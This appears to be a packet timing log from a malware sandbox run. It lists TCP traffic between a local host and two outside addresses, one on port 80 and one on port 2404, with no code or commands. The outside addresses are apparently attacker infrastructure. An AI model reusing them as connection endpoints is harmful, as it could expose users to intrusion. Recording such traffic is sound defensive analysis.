                                          Sep 30, 2024 13:59:44.012876034 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012887955 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012900114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012922049 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012944937 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012950897 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012957096 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012967110 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012985945 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013026953 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013052940 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013066053 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013077021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013092995 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013094902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013106108 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013128042 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013173103 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013289928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013348103 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013377905 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013422012 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013422966 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013436079 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013474941 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013479948 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013492107 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013501883 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013513088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013521910 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013525963 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013551950 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013586998 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013622046 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013633013 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013643980 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013654947 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013664961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013667107 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013675928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013706923 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013710022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013719082 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013731956 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013748884 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013760090 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013766050 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013775110 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013801098 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013807058 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013819933 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013820887 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013830900 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013840914 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013850927 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013880968 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017494917 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017544031 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017580986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017626047 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017628908 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017640114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017678022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017692089 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017708063 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017718077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017729044 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017735004 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017740965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017771959 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017785072 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017796040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017805099 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017807961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017818928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017829895 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017836094 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017839909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017853975 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017874002 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017899036 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017930984 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017942905 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017966032 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017975092 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018001080 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018006086 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018021107 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018032074 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018042088 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018043995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018074989 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018102884 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018105984 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018116951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018126965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018137932 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018146038 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018148899 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018160105 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018170118 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018171072 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018205881 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018224955 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018368959 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018379927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018390894 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018423080 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018450022 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018454075 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018462896 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:48.971333027 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971350908 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.971365929 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971379995 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971400023 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971415043 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971416950 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.971429110 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971434116 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.971906900 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971918106 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971927881 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971946001 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.971966028 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.971982002 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.971992970 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972006083 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972018003 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972023964 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972028017 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972044945 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972063065 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972795010 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972807884 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972820044 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972847939 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972862005 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972872972 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972882986 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972893000 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972898006 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972903967 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.972925901 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.972944975 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.973674059 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973686934 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973699093 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973728895 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.973752022 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973762035 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973773003 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973784924 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973790884 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.973802090 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.973819017 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.973839998 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.974577904 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974589109 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974600077 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974627018 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974628925 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.974638939 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974649906 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974658966 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.974661112 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.974678040 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.974685907 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975419044 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975430012 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975440979 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975483894 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.975501060 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.975502968 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975517988 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975528955 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975539923 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975549936 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.975553036 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.975568056 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.975604057 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.976341009 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976351976 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976362944 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976386070 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.976408958 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976419926 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976429939 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976440907 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976450920 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.976454973 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.976454973 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.976464033 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.976488113 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.977246046 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977257013 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977267027 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977277040 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977288961 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.977310896 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.977690935 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977704048 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977714062 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977740049 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.977751970 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977761984 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977771997 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977783918 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.977791071 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.977802038 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978357077 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978514910 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978559017 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978559971 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978594065 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978777885 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978789091 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978800058 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978821039 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978826046 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978832006 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978842974 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978852987 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978863001 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.978863955 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978888988 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.978914976 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.979655027 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979665041 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979676962 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979700089 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979705095 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.979712009 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979722977 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979732990 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979738951 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.979744911 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.979762077 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.979785919 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.980492115 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980639935 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980683088 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.980786085 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980798960 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980808973 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980818987 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980839968 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980849028 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980859041 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980866909 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.980866909 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.980870962 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.980892897 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.980918884 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.981662989 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981674910 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981684923 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981718063 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981717110 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.981730938 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981740952 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981750965 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981750011 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.981761932 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.981767893 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.981795073 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.982537031 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.982547998 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.982558966 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.982569933 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.982587099 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.982616901 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.982984066 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.982995987 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983006001 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983016968 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983033895 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.983072996 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.983431101 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983443022 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983453989 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983490944 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983499050 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.983500957 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983510971 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983521938 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983524084 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.983531952 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.983557940 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.983584881 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.984332085 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984344006 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984354973 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984383106 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984392881 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.984407902 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984421968 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984424114 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.984432936 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984443903 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.984460115 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.984477997 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.985166073 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985197067 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985208035 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985238075 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.985280037 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985292912 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985302925 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985313892 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985317945 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.985325098 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.985359907 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986099958 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986110926 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986121893 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986148119 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986152887 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986160040 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986171007 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986181974 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986207008 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986253977 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986264944 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986275911 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986287117 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986290932 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986298084 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986309052 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986318111 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986321926 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986329079 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986340046 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986386061 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986406088 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986418962 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986428022 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986443043 CEST240449739107.173.4.16192.168.2.4
                                          Sep 30, 2024 13:59:48.986449957 CEST497392404192.168.2.4107.173.4.16
                                          Sep 30, 2024 13:59:48.986453056 CEST240449739107.173.4.16192.168.2.4
